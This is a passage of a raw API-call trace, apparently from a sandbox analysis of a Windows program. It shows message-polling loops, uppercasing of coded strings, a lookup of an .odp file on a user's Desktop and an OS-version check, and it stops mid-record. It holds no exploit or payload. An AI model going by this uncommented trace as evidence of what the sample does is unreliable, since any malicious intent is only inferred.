returned 0 [0145.458] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.458] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.458] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.458] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.458] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.458] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.459] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.459] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.459] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.459] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.460] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.461] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.462] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.462] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/0AFNgyUK36kK5YHPO1.odp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45d48680, ftCreationTime.dwHighDateTime=0x1d4c9d5, ftLastAccessTime.dwLowDateTime=0x32b45a40, ftLastAccessTime.dwHighDateTime=0x1d4c87b, ftLastWriteTime.dwLowDateTime=0x32b45a40, ftLastWriteTime.dwHighDateTime=0x1d4c87b, nFileSizeHigh=0x0, nFileSizeLow=0xa1f8, dwReserved0=0xb660183, dwReserved1=0x9e95, cFileName="0AFNgyUK36kK5YHPO1.odp", cAlternateFileName="0AFNGY~1.ODP")) returned 0xaa55e0 [0145.463] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0145.463] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.463] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0145.463] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0145.463] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0145.463] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0145.463] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.463] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] PeekMessageW (in: lpMsg=0x8befd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befd0) returned 0 [0145.464] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.464] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.464] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.464] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.464] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0145.465] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0145.465] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.465] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aae78 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f38 [0145.466] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0145.466] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0145.466] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.466] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab028 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab040 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab118 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0145.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab028 | out: hHeap=0x25c0000) returned 1 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab028 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fc8 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab148 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0e8 [0145.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0145.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0145.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0145.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab118 | out: hHeap=0x25c0000) returned 1 [0145.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab028 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab040 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafc8 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaff8 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1a8 | out: hHeap=0x25c0000) returned 1 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1a8 [0145.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0e8 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1a8 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1a8 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab148 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.467] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0145.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab0e8 [0145.467] 